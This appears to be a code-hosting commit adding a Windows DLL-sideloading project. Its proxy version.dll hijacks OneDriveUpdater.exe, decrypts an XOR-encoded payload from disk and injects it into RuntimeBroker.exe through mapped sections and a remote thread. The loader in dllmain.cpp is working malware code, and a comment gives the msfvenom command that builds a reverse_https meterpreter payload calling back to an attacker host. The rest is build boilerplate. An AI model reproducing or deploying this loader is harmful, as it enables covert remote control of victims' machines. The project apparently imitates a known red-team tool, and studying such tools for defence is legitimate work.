STRLCPY/OneDriveUpdaterSideloading

Add project files.
Sung Gwan Choi committed 2 years ago

64f78c2a

1 parent 1c396c4a

■ ■ ■ ■ ■ ■

CreateSection.h

1	+	#pragma once
2	+
3	+	//All credits to https://github.com/peperunas/injectopi/tree/master/CreateSection
4	+	//@file CreateSection.h
5	+	//@author Giulio De Pasquale, hasherezade
6	+	//@brief Section Hijacking
7	+	#pragma once
8	+
9	+	#include <Windows.h>
10	+	#include <stdio.h>
11	+
12	+	#if !defined NTSTATUS
13	+	typedef LONG NTSTATUS;
14	+	#endif
15	+
16	+	#define STATUS_SUCCESS 0
17	+
18	+	#if !defined PROCESSINFOCLASS
19	+	typedef LONG PROCESSINFOCLASS;
20	+	#endif
21	+
22	+	#if !defined PPEB
23	+	typedef struct _PEB* PPEB;
24	+	#endif
25	+
26	+	#if !defined PROCESS_BASIC_INFORMATION
27	+	typedef struct _PROCESS_BASIC_INFORMATION {
28	+	PVOID Reserved1;
29	+	PPEB PebBaseAddress;
30	+	PVOID Reserved2[2];
31	+	ULONG_PTR UniqueProcessId;
32	+	PVOID Reserved3;
33	+	} PROCESS_BASIC_INFORMATION;
34	+	#endif;
35	+
36	+	typedef LONG NTSTATUS, * PNTSTATUS;
37	+	typedef struct _UNICODE_STRING {
38	+	USHORT Length;
39	+	USHORT MaximumLength;
40	+	PWSTR Buffer;
41	+	} UNICODE_STRING, * PUNICODE_STRING;
42	+
43	+	typedef struct _OBJECT_ATTRIBUTES {
44	+	ULONG Length;
45	+	HANDLE RootDirectory;
46	+	PUNICODE_STRING ObjectName;
47	+	ULONG Attributes;
48	+	PVOID SecurityDescriptor;
49	+	PVOID SecurityQualityOfService;
50	+	} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
51	+
52	+	#define NT_SUCCESS(Status) ((NTSTATUS)(Status) == STATUS_SUCCESS)
53	+
54	+	typedef OBJECT_ATTRIBUTES* POBJECT_ATTRIBUTES;
55	+	#define InitializeObjectAttributes( p, n, a, r, s ) { \
56	+	(p)->Length = sizeof( OBJECT_ATTRIBUTES ); \
57	+	(p)->RootDirectory = r; \
58	+	(p)->Attributes = a; \
59	+	(p)->ObjectName = n; \
60	+	(p)->SecurityDescriptor = s; \
61	+	(p)->SecurityQualityOfService = NULL; \
62	+	}
63	+
64	+	typedef NTSTATUS(WINAPI* PFN_ZWQUERYINFORMATIONPROCESS)(HANDLE,
65	+	PROCESSINFOCLASS, PVOID,
66	+	ULONG, PULONG);
67	+
68	+	NTSTATUS(NTAPI* ZwQueryInformationProcess)
69	+	(HANDLE ProcessHandle, PROCESSINFOCLASS ProcessInformationClass,
70	+	PVOID ProcessInformation, ULONG ProcessInformationLength, PULONG ReturnLength);
71	+
72	+	NTSTATUS(NTAPI* ZwCreateSection)
73	+	(_Out_ PHANDLE SectionHandle, _In_ ACCESS_MASK DesiredAccess,
74	+	_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
75	+	_In_opt_ PLARGE_INTEGER MaximumSize, _In_ ULONG SectionPageProtection,
76	+	_In_ ULONG AllocationAttributes, _In_opt_ HANDLE FileHandle);
77	+
78	+	NTSTATUS(NTAPI* NtMapViewOfSection)
79	+	(_In_ HANDLE SectionHandle, _In_ HANDLE ProcessHandle,
80	+	_Inout_ PVOID* BaseAddress, _In_ ULONG_PTR ZeroBits, _In_ SIZE_T CommitSize,
81	+	_Inout_opt_ PLARGE_INTEGER SectionOffset, _Inout_ PSIZE_T ViewSize,
82	+	_In_ DWORD InheritDisposition, _In_ ULONG AllocationType,
83	+	_In_ ULONG Win32Protect);
84	+
85	+	NTSTATUS(NTAPI* ZwCreateThreadEx)
86	+	(_Out_ PHANDLE ThreadHandle, _In_ ACCESS_MASK DesiredAccess,
87	+	_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, _In_ HANDLE ProcessHandle,
88	+	_In_ PVOID StartRoutine, _In_opt_ PVOID Argument, _In_ ULONG CreateFlags,
89	+	_In_opt_ ULONG_PTR ZeroBits, _In_opt_ SIZE_T StackSize,
90	+	_In_opt_ SIZE_T MaximumStackSize, _In_opt_ PVOID AttributeList);
91	+
92	+
93	+	NTSTATUS(NTAPI* ZwUnmapViewOfSection)
94	+	(_In_ HANDLE ProcessHandle, _In_opt_ PVOID BaseAddress);
95	+
96	+
97	+	NTSTATUS(NTAPI* ZwClose)(_In_ HANDLE Handle);
98	+
99	+	typedef struct _CLIENT_ID
100	+	{
101	+	PVOID UniqueProcess;
102	+	PVOID UniqueThread;
103	+	} CLIENT_ID, * PCLIENT_ID;
104	+
105	+	NTSTATUS(NTAPI* ZwOpenProcess)
106	+	(
107	+	PHANDLE ProcessHandle,
108	+	ACCESS_MASK DesiredAccess,
109	+	POBJECT_ATTRIBUTES ObjectAttributes,
110	+	PCLIENT_ID ClientID
111	+	);
112	+
113	+	NTSTATUS(NTAPI* NtDelayExecution)(
114	+	BOOL Alertable,
115	+	PLARGE_INTEGER DelayInterval
116	+	);
117	+

■ ■ ■ ■ ■ ■

README.md

1	+	# OneDriveUpdater DLL Sideloading
2	+	This repo contains source code for DLL sideloading the `version.dll` for OneDriveUpdater.exe/OneDriveStandaloneUpdater.exe.
3	+	The payload is based on the subroutines outlined in the PaloAltoNetworks Unit42's [blog post](https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/).
4	+
5	+	My blog post regarding this payload:
6	+
7	+	## version
8	+	Modified source code from the proxy DLL created by [SharpDLLProxy](https://github.com/Flangvik/SharpDllProxy) from [Flangvik](https://twitter.com/Flangvik).
9	+
10	+	## versionConsole
11	+	A console version of the above used for debugging purposes. Already contains a messagebox shellcode.
12	+
13	+	## Credits
14	+	- [PaloAltoNetworks Unit42](https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/)
15	+	- [Peperunas](https://twitter.com/peperunas)'s [injectopi](https://github.com/peperunas/injectopi/tree/master/CreateSection)
16	+	- [Sektor7's RTO Malware Essential Course](https://institute.sektor7.net/red-team-operator-malware-development-essentials)
17	+	- [mgeeky](https://twitter.com/mariuszbit)'s [PackMyPayload](https://github.com/mgeeky/PackMyPayload)
18	+	- [Flangvik](https://twitter.com/Flangvik)'s [SharpDllProxy](https://github.com/Flangvik/SharpDllProxy)
19	+

■ ■ ■ ■ ■ ■

dllmain.cpp

1	+
2	+	#include "pch.h"
3	+	#include <Windows.h>
4	+	#include <TlHelp32.h>
5	+	#include <stdlib.h>
6	+	#include "CreateSection.h"
7	+	#pragma comment(lib, "ntdll")
8	+
9	+	#define _CRT_SECURE_NO_DEPRECATE
10	+	#pragma warning (disable : 4996)
11	+
12	+	#pragma comment(linker, "/export:GetFileVersionInfoA=vresion.GetFileVersionInfoA,@1")
13	+	#pragma comment(linker, "/export:GetFileVersionInfoByHandle=vresion.GetFileVersionInfoByHandle,@2")
14	+	#pragma comment(linker, "/export:GetFileVersionInfoExA=vresion.GetFileVersionInfoExA,@3")
15	+	#pragma comment(linker, "/export:GetFileVersionInfoExW=vresion.GetFileVersionInfoExW,@4")
16	+	#pragma comment(linker, "/export:GetFileVersionInfoSizeA=vresion.GetFileVersionInfoSizeA,@5")
17	+	#pragma comment(linker, "/export:GetFileVersionInfoSizeExA=vresion.GetFileVersionInfoSizeExA,@6")
18	+	#pragma comment(linker, "/export:GetFileVersionInfoSizeExW=vresion.GetFileVersionInfoSizeExW,@7")
19	+	#pragma comment(linker, "/export:GetFileVersionInfoSizeW=vresion.GetFileVersionInfoSizeW,@8")
20	+	#pragma comment(linker, "/export:GetFileVersionInfoW=vresion.GetFileVersionInfoW,@9")
21	+	#pragma comment(linker, "/export:VerFindFileA=vresion.VerFindFileA,@10")
22	+	#pragma comment(linker, "/export:VerFindFileW=vresion.VerFindFileW,@11")
23	+	#pragma comment(linker, "/export:VerInstallFileA=vresion.VerInstallFileA,@12")
24	+	#pragma comment(linker, "/export:VerInstallFileW=vresion.VerInstallFileW,@13")
25	+	#pragma comment(linker, "/export:VerLanguageNameA=vresion.VerLanguageNameA,@14")
26	+	#pragma comment(linker, "/export:VerLanguageNameW=vresion.VerLanguageNameW,@15")
27	+	#pragma comment(linker, "/export:VerQueryValueA=vresion.VerQueryValueA,@16")
28	+	#pragma comment(linker, "/export:VerQueryValueW=vresion.VerQueryValueW,@17")
29	+
30	+	// All credits to https://github.com/peperunas/injectopi/blob/master/CreateSection/CreateSection.cpp
31	+	// and https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/#Modification-of-Versiondll
32	+
33	+	BOOL LoadNtdllFunctions() {
34	+	HMODULE ntdll = GetModuleHandleA("ntdll.dll");
35	+
36	+	ZwOpenProcess = (NTSTATUS(NTAPI*)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, PCLIENT_ID))GetProcAddress(ntdll, "ZwOpenProcess");
37	+	if (ZwOpenProcess == NULL) return FALSE;
38	+
39	+	ZwCreateSection = (NTSTATUS(NTAPI*)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, PLARGE_INTEGER, ULONG, ULONG, HANDLE))
40	+	GetProcAddress(ntdll, "ZwCreateSection");
41	+	if (ZwCreateSection == NULL) return FALSE;
42	+
43	+	NtMapViewOfSection = (NTSTATUS(NTAPI)(HANDLE, HANDLE, PVOID, ULONG_PTR, SIZE_T, PLARGE_INTEGER, PSIZE_T, DWORD, ULONG, ULONG))
44	+	GetProcAddress(ntdll, "NtMapViewOfSection");
45	+	if (NtMapViewOfSection == NULL) return FALSE;
46	+
47	+	ZwCreateThreadEx = (NTSTATUS(NTAPI*)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, HANDLE, PVOID, PVOID, ULONG, ULONG_PTR, SIZE_T, SIZE_T, PVOID))
48	+	GetProcAddress(ntdll, "ZwCreateThreadEx");
49	+	if (ZwCreateThreadEx == NULL) return FALSE;
50	+
51	+	NtDelayExecution = (NTSTATUS(NTAPI*)(BOOL, PLARGE_INTEGER))GetProcAddress(ntdll, "NtDelayExecution");
52	+	if (NtDelayExecution == NULL) return FALSE;
53	+
54	+
55	+	ZwClose = (NTSTATUS(NTAPI*)(HANDLE))GetProcAddress(ntdll, "ZwClose");
56	+	if (ZwClose == NULL) return FALSE;
57	+
58	+	return TRUE;
59	+	}
60	+
61	+	HANDLE getProcHandlebyName(const char* procName) {
62	+	PROCESSENTRY32 entry;
63	+	entry.dwSize = sizeof(PROCESSENTRY32);
64	+	NTSTATUS status = NULL;
65	+	HANDLE hProc = 0;
66	+
67	+	HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
68	+	if (Process32First(snapshot, &entry)) {
69	+	do {
70	+	if (strcmp((entry.szExeFile), procName) == 0) {
71	+	OBJECT_ATTRIBUTES oa;
72	+	CLIENT_ID cid = { (HANDLE)entry.th32ProcessID, NULL };
73	+	InitializeObjectAttributes(&oa, nullptr, 0, nullptr, nullptr);
74	+	// 3. Call the Windows API ntdll ZwOpenProcess using the process ID from step 1. The process is opened with full control access.
75	+	status = ZwOpenProcess(&hProc, PROCESS_ALL_ACCESS, &oa, &cid);
76	+
77	+	if (!NT_SUCCESS(status)) {
78	+	continue;
79	+	}
80	+	return hProc;
81	+	}
82	+	} while (Process32Next(snapshot, &entry));
83	+	}
84	+	ZwClose(snapshot);
85	+
86	+	return NULL;
87	+	}
88	+
89	+	// credit: Sektor7 RTO Malware Essential Course
90	+	void XOR(char* data, size_t data_len, char* key, size_t key_len) {
91	+	int j;
92	+
93	+	j = 0;
94	+	for (int i = 0; i < data_len; i++) {
95	+	if (j == key_len - 1) j = 0;
96	+
97	+	data[i] = data[i] ^ key[j];
98	+	j++;
99	+	}
100	+	}
101	+
102	+
103	+	DWORD WINAPI DoMagic(LPVOID lpParameter)
104	+	{
105	+	if (LoadNtdllFunctions() == FALSE) {
106	+	printf("[-] Failed to load NTDLL function\n");
107	+	return -1;
108	+	}
109	+
110	+	// 1. Enumerate all process and locate process for RuntimeBroker.exe
111	+	// https://stackoverflow.com/questions/865152/how-can-i-get-a-process-handle-by-its-name-in-c
112	+	HANDLE hProc = getProcHandlebyName("RuntimeBroker.exe");
113	+	if (hProc == NULL) {
114	+	exit(0);
115	+	}
116	+
117	+	// 2. Read the payload file OneDrive.Update from the current working directory.
118	+	// msfvenom -p windows/x64/meterpreter/reverse_https lhost=<ip> lport=<port> f raw -o /root/attack/OneDrive.Update exitfunc=thread --encrypt xor --encrypt-key "jikoewarfkmzsdlhfnuiwaejrpaw" exitfunc=thread
119	+	FILE* fp;
120	+	size_t shellcodeSize;
121	+	unsigned char* shellcode;
122	+	fp = fopen("OneDrive.Update", "rb");
123	+	fseek(fp, 0, SEEK_END);
124	+	shellcodeSize = ftell(fp);
125	+	fseek(fp, 0, SEEK_SET);
126	+	shellcode = (unsigned char*)malloc(shellcodeSize);
127	+	fread(shellcode, shellcodeSize, 1, fp);
128	+
129	+	char key[] = "jikoewarfkmzsdlhfnuiwaejrpaw";
130	+
131	+	// 4. Decrypt the payload file using the XOR encryption algorithm with a 28-byte key of: jikoewarfkmzsdlhfnuiwaejrpaw
132	+	XOR((char*)shellcode, shellcodeSize, key, sizeof(key));
133	+
134	+	HANDLE hSection = NULL;
135	+	NTSTATUS status = NULL;
136	+	SIZE_T size = 4096;
137	+	LARGE_INTEGER sectionSize = { size };
138	+	PVOID pLocalView = NULL, pRemoteView = NULL;
139	+	SIZE_T scLength = sizeof(shellcode);
140	+	int viewUnMap = 2;
141	+
142	+	// 5. Call the Windows API NtCreateSection, which creates a block of memory that can be shared between processes.
143	+	if ((status = ZwCreateSection(&hSection, SECTION_ALL_ACCESS, NULL, (PLARGE_INTEGER)&sectionSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL)) != STATUS_SUCCESS) {
144	+	return -1;
145	+	}
146	+
147	+	// 6. Two calls into the Windows API NtMapViewOfSection. The first call maps the contents of the decrypted payload into the current process memory space.
148	+	if ((status = NtMapViewOfSection(hSection, GetCurrentProcess(),
149	+	&pLocalView, NULL, NULL, NULL,
150	+	&size, viewUnMap, NULL, PAGE_READWRITE)) != STATUS_SUCCESS) {
151	+	return -1;
152	+	}
153	+
154	+	// Use for in-file shellcode
155	+	//memcpy(pLocalView, shellcode, sizeof(shellcode));
156	+
157	+	// Use for on-disk shellcode
158	+	memcpy(pLocalView, shellcode, shellcodeSize);
159	+
160	+	// 6. Second call maps the contents into the Runtimebroker.exe memory space.
161	+	if ((status = NtMapViewOfSection(hSection, hProc, &pRemoteView, NULL, NULL, NULL,
162	+	&size, viewUnMap, NULL, PAGE_EXECUTE_READWRITE)) != STATUS_SUCCESS) {
163	+	return -1;
164	+	}
165	+
166	+	// 7. Calls the Windows API NtDelayExecution and sleeps (pauses execution) for ~4.27 seconds
167	+	LARGE_INTEGER interval;
168	+	interval.QuadPart = -1 * (int)(4270 * 10000.0f);
169	+	if ((status = NtDelayExecution(TRUE, &interval)) != STATUS_SUCCESS) {
170	+	printf("[-] Cannot delay execution. Error code: %08X\n", status);
171	+	return -1;
172	+	}
173	+
174	+	// 8. Call the Windows API NtCreateThreadEx.
175	+	HANDLE hThread = NULL;
176	+	if ((status = ZwCreateThreadEx(&hThread, 0x1FFFFF, NULL, hProc, pRemoteView, NULL, CREATE_SUSPENDED, 0, 0, 0, 0)) != STATUS_SUCCESS) {
177	+	return -1;
178	+	}
179	+
180	+	ResumeThread(hThread);
181	+
182	+	// 9. Calls the Windows API NtDelayExecution and sleeps (pauses execution) for ~4.27 seconds
183	+	interval.QuadPart = -1 * (int)(4270 * 10000.0f);
184	+	if ((status = NtDelayExecution(TRUE, &interval)) != STATUS_SUCCESS) {
185	+	printf("[-] Cannot delay execution. Error code: %08X\n", status);
186	+	return -1;
187	+	}
188	+
189	+	// 10. Finished.
190	+	return 0;
191	+	}
192	+
193	+	BOOL APIENTRY DllMain(HMODULE hModule,
194	+	DWORD ul_reason_for_call,
195	+	LPVOID lpReserved
196	+	)
197	+	{
198	+	HANDLE threadHandle;
199	+
200	+	switch (ul_reason_for_call)
201	+	{
202	+	case DLL_PROCESS_ATTACH:
203	+	// https://gist.github.com/securitytube/c956348435cc90b8e1f7
204	+	// Create a thread and close the handle as we do not want to use it to wait for it
205	+	threadHandle = CreateThread(NULL, 0, DoMagic, NULL, 0, NULL);
206	+	CloseHandle(threadHandle);
207	+
208	+	case DLL_THREAD_ATTACH:
209	+	break;
210	+	case DLL_THREAD_DETACH:
211	+	break;
212	+	case DLL_PROCESS_DETACH:
213	+	Sleep(5000);
214	+	break;
215	+	}
216	+	return TRUE;
217	+	}

■ ■ ■ ■ ■ ■

framework.h

1 + #pragma once
2 +
3 + #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
4 + // Windows Header Files
5 + #include <windows.h>
6 +

All occurrences

■ ■ ■ ■ ■ ■

pch.cpp

1	+	// pch.cpp: source file corresponding to the pre-compiled header
2	+
3	+	#include "pch.h"
4	+
5	+	// When you are using pre-compiled headers, this source file is necessary for compilation to succeed.
6	+

■ ■ ■ ■ ■ ■

pch.h

1	+	// pch.h: This is a precompiled header file.
2	+	// Files listed below are compiled only once, improving build performance for future builds.
3	+	// This also affects IntelliSense performance, including code completion and many code browsing features.
4	+	// However, files listed here are ALL re-compiled if any one of them is updated between builds.
5	+	// Do not add files here that you will be updating frequently as this negates the performance advantage.
6	+
7	+	#ifndef PCH_H
8	+	#define PCH_H
9	+
10	+	// add headers that you want to pre-compile here
11	+	#include "framework.h"
12	+
13	+	#endif //PCH_H
14	+

■ ■ ■ ■ ■ ■

version.sln

1	+
2	+	Microsoft Visual Studio Solution File, Format Version 12.00
3	+	# Visual Studio Version 16
4	+	VisualStudioVersion = 16.0.32228.343
5	+	MinimumVisualStudioVersion = 10.0.40219.1
6	+	Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "version", "version.vcxproj", "{51E6D98F-C249-4BC6-82A7-838F05F9ABE9}"
7	+	EndProject
8	+	Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "versionConsole", "versionConsole\versionConsole.vcxproj", "{19D8DD80-682E-4F0B-BBEE-A04FB5CFD0D1}"
9	+	EndProject
10	+	Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Solution Items", "Solution Items", "{8C60B5B4-88E9-458E-98F2-47409AEF96A5}"
11	+	ProjectSection(SolutionItems) = preProject
12	+	README.md = README.md
13	+	EndProjectSection
14	+	EndProject
15	+	Global
16	+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
17	+	Debug\|x64 = Debug\|x64
18	+	Debug\|x86 = Debug\|x86
19	+	Release\|x64 = Release\|x64
20	+	Release\|x86 = Release\|x86
21	+	EndGlobalSection
22	+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
23	+	{51E6D98F-C249-4BC6-82A7-838F05F9ABE9}.Debug\|x64.ActiveCfg = Debug\|x64
24	+	{51E6D98F-C249-4BC6-82A7-838F05F9ABE9}.Debug\|x64.Build.0 = Debug\|x64
25	+	{51E6D98F-C249-4BC6-82A7-838F05F9ABE9}.Debug\|x86.ActiveCfg = Debug\|Win32
26	+	{51E6D98F-C249-4BC6-82A7-838F05F9ABE9}.Debug\|x86.Build.0 = Debug\|Win32
27	+	{51E6D98F-C249-4BC6-82A7-838F05F9ABE9}.Release\|x64.ActiveCfg = Release\|x64
28	+	{51E6D98F-C249-4BC6-82A7-838F05F9ABE9}.Release\|x64.Build.0 = Release\|x64
29	+	{51E6D98F-C249-4BC6-82A7-838F05F9ABE9}.Release\|x86.ActiveCfg = Release\|Win32
30	+	{51E6D98F-C249-4BC6-82A7-838F05F9ABE9}.Release\|x86.Build.0 = Release\|Win32
31	+	{19D8DD80-682E-4F0B-BBEE-A04FB5CFD0D1}.Debug\|x64.ActiveCfg = Debug\|x64
32	+	{19D8DD80-682E-4F0B-BBEE-A04FB5CFD0D1}.Debug\|x64.Build.0 = Debug\|x64
33	+	{19D8DD80-682E-4F0B-BBEE-A04FB5CFD0D1}.Debug\|x86.ActiveCfg = Debug\|Win32
34	+	{19D8DD80-682E-4F0B-BBEE-A04FB5CFD0D1}.Debug\|x86.Build.0 = Debug\|Win32
35	+	{19D8DD80-682E-4F0B-BBEE-A04FB5CFD0D1}.Release\|x64.ActiveCfg = Release\|x64
36	+	{19D8DD80-682E-4F0B-BBEE-A04FB5CFD0D1}.Release\|x64.Build.0 = Release\|x64
37	+	{19D8DD80-682E-4F0B-BBEE-A04FB5CFD0D1}.Release\|x86.ActiveCfg = Release\|Win32
38	+	{19D8DD80-682E-4F0B-BBEE-A04FB5CFD0D1}.Release\|x86.Build.0 = Release\|Win32
39	+	EndGlobalSection
40	+	GlobalSection(SolutionProperties) = preSolution
41	+	HideSolutionNode = FALSE
42	+	EndGlobalSection
43	+	GlobalSection(ExtensibilityGlobals) = postSolution
44	+	SolutionGuid = {9E6BDCD3-E7D2-414E-B7BF-BC8FE058661C}
45	+	EndGlobalSection
46	+	EndGlobal
47	+

■ ■ ■ ■ ■ ■

version.vcxproj

1	+	<?xml version="1.0" encoding="utf-8"?>
2	+	<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3	+	<ItemGroup Label="ProjectConfigurations">
4	+	<ProjectConfiguration Include="Debug\|Win32">
5	+	<Configuration>Debug</Configuration>
6	+	<Platform>Win32</Platform>
7	+	</ProjectConfiguration>
8	+	<ProjectConfiguration Include="Release\|Win32">
9	+	<Configuration>Release</Configuration>
10	+	<Platform>Win32</Platform>
11	+	</ProjectConfiguration>
12	+	<ProjectConfiguration Include="Debug\|x64">
13	+	<Configuration>Debug</Configuration>
14	+	<Platform>x64</Platform>
15	+	</ProjectConfiguration>
16	+	<ProjectConfiguration Include="Release\|x64">
17	+	<Configuration>Release</Configuration>
18	+	<Platform>x64</Platform>
19	+	</ProjectConfiguration>
20	+	</ItemGroup>
21	+	<PropertyGroup Label="Globals">
22	+	<VCProjectVersion>16.0</VCProjectVersion>
23	+	<Keyword>Win32Proj</Keyword>
24	+	<ProjectGuid>{51e6d98f-c249-4bc6-82a7-838f05f9abe9}</ProjectGuid>
25	+	<RootNamespace>version</RootNamespace>
26	+	<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
27	+	</PropertyGroup>
28	+	<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
29	+	<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='Debug\|Win32'" Label="Configuration">
30	+	<ConfigurationType>DynamicLibrary</ConfigurationType>
31	+	<UseDebugLibraries>true</UseDebugLibraries>
32	+	<PlatformToolset>v142</PlatformToolset>
33	+	<CharacterSet>Unicode</CharacterSet>
34	+	</PropertyGroup>
35	+	<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='Release\|Win32'" Label="Configuration">
36	+	<ConfigurationType>DynamicLibrary</ConfigurationType>
37	+	<UseDebugLibraries>false</UseDebugLibraries>
38	+	<PlatformToolset>v142</PlatformToolset>
39	+	<WholeProgramOptimization>true</WholeProgramOptimization>
40	+	<CharacterSet>Unicode</CharacterSet>
41	+	</PropertyGroup>
42	+	<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='Debug\|x64'" Label="Configuration">
43	+	<ConfigurationType>DynamicLibrary</ConfigurationType>
44	+	<UseDebugLibraries>true</UseDebugLibraries>
45	+	<PlatformToolset>v142</PlatformToolset>
46	+	<CharacterSet>Unicode</CharacterSet>
47	+	</PropertyGroup>
48	+	<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='Release\|x64'" Label="Configuration">
49	+	<ConfigurationType>DynamicLibrary</ConfigurationType>
50	+	<UseDebugLibraries>false</UseDebugLibraries>
51	+	<PlatformToolset>v142</PlatformToolset>
52	+	<WholeProgramOptimization>true</WholeProgramOptimization>
53	+	<CharacterSet>MultiByte</CharacterSet>
54	+	</PropertyGroup>
55	+	<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
56	+	<ImportGroup Label="ExtensionSettings">
57	+	</ImportGroup>
58	+	<ImportGroup Label="Shared">
59	+	</ImportGroup>
60	+	<ImportGroup Label="PropertySheets" Condition="'$(Configuration)\|$(Platform)'=='Debug\|Win32'">
61	+	<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
62	+	</ImportGroup>
63	+	<ImportGroup Label="PropertySheets" Condition="'$(Configuration)\|$(Platform)'=='Release\|Win32'">
64	+	<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
65	+	</ImportGroup>
66	+	<ImportGroup Label="PropertySheets" Condition="'$(Configuration)\|$(Platform)'=='Debug\|x64'">
67	+	<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
68	+	</ImportGroup>
69	+	<ImportGroup Label="PropertySheets" Condition="'$(Configuration)\|$(Platform)'=='Release\|x64'">
70	+	<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
71	+	</ImportGroup>
72	+	<PropertyGroup Label="UserMacros" />
73	+	<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='Debug\|Win32'">
74	+	<LinkIncremental>true</LinkIncremental>
75	+	</PropertyGroup>
76	+	<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='Release\|Win32'">
77	+	<LinkIncremental>false</LinkIncremental>
78	+	</PropertyGroup>
79	+	<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='Debug\|x64'">
80	+	<LinkIncremental>true</LinkIncremental>
81	+	</PropertyGroup>
82	+	<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='Release\|x64'">
83	+	<LinkIncremental>false</LinkIncremental>
84	+	</PropertyGroup>
85	+	<ItemDefinitionGroup Condition="'$(Configuration)\|$(Platform)'=='Debug\|Win32'">
86	+	<ClCompile>
87	+	<WarningLevel>Level3</WarningLevel>
88	+	<SDLCheck>true</SDLCheck>
89	+	<PreprocessorDefinitions>WIN32;_DEBUG;VERSION_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
90	+	<ConformanceMode>true</ConformanceMode>
91	+	<PrecompiledHeader>Use</PrecompiledHeader>
92	+	<PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
93	+	</ClCompile>
94	+	<Link>
95	+	<SubSystem>Windows</SubSystem>
96	+	<GenerateDebugInformation>true</GenerateDebugInformation>
97	+	<EnableUAC>false</EnableUAC>
98	+	</Link>
99	+	</ItemDefinitionGroup>
100	+	<ItemDefinitionGroup Condition="'$(Configuration)\|$(Platform)'=='Release\|Win32'">
101	+	<ClCompile>
102	+	<WarningLevel>Level3</WarningLevel>
103	+	<FunctionLevelLinking>true</FunctionLevelLinking>
104	+	<IntrinsicFunctions>true</IntrinsicFunctions>
105	+	<SDLCheck>true</SDLCheck>
106	+	<PreprocessorDefinitions>WIN32;NDEBUG;VERSION_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
107	+	<ConformanceMode>true</ConformanceMode>
108	+	<PrecompiledHeader>Use</PrecompiledHeader>
109	+	<PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
110	+	</ClCompile>
111	+	<Link>
112	+	<SubSystem>Windows</SubSystem>
113	+	<EnableCOMDATFolding>true</EnableCOMDATFolding>
114	+	<OptimizeReferences>true</OptimizeReferences>
115	+	<GenerateDebugInformation>true</GenerateDebugInformation>
116	+	<EnableUAC>false</EnableUAC>
117	+	</Link>
118	+	</ItemDefinitionGroup>
119	+	<ItemDefinitionGroup Condition="'$(Configuration)\|$(Platform)'=='Debug\|x64'">
120	+	<ClCompile>
121	+	<WarningLevel>Level3</WarningLevel>
122	+	<SDLCheck>true</SDLCheck>
123	+	<PreprocessorDefinitions>_DEBUG;VERSION_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
124	+	<ConformanceMode>true</ConformanceMode>
125	+	<PrecompiledHeader>Use</PrecompiledHeader>
126	+	<PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
127	+	</ClCompile>
128	+	<Link>
129	+	<SubSystem>Windows</SubSystem>
130	+	<GenerateDebugInformation>true</GenerateDebugInformation>
131	+	<EnableUAC>false</EnableUAC>
132	+	</Link>
133	+	</ItemDefinitionGroup>
134	+	<ItemDefinitionGroup Condition="'$(Configuration)\|$(Platform)'=='Release\|x64'">
135	+	<ClCompile>
136	+	<WarningLevel>Level3</WarningLevel>
137	+	<FunctionLevelLinking>true</FunctionLevelLinking>
138	+	<IntrinsicFunctions>true</IntrinsicFunctions>
139	+	<SDLCheck>true</SDLCheck>
140	+	<PreprocessorDefinitions>NDEBUG;VERSION_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
141	+	<ConformanceMode>true</ConformanceMode>
142	+	<PrecompiledHeader>Use</PrecompiledHeader>
143	+	<PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
144	+	</ClCompile>
145	+	<Link>
146	+	<SubSystem>Windows</SubSystem>
147	+	<EnableCOMDATFolding>true</EnableCOMDATFolding>
148	+	<OptimizeReferences>true</OptimizeReferences>
149	+	<GenerateDebugInformation>true</GenerateDebugInformation>
150	+	<EnableUAC>false</EnableUAC>
151	+	</Link>
152	+	</ItemDefinitionGroup>
153	+	<ItemGroup>
